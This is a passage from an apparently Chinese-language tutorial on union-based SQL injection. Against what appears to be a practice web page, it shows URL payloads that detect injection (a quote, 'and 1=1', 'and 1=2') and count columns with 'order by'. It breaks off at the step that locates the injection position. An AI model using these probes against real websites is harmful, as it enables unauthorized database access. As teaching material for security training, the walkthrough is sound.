1.union注入攻击
1)判断是否存在注入
URL:http://www.tianchi.com/web/union.php?id=1
URL:http://www.tianchi.com/web/union.php?id=1'
URL:http://www.tianchi.com/web/union.php?id=1 and 1=1
URL:http://www.tianchi.com/web/union.php?id=1 and 1=2
发现可能存在SQL注入漏洞。
2)查询字段数量
URL:http://www.tianchi.com/web/union.php?id=1 order by 3
当id=1 order by 3时,页面返回与id=1相同的结果;而id=1 order by 4时不一样,故字段数量是3。
3)查询SQL语句插入位置
URL:http://www.tianchi.com/web/union.php?id=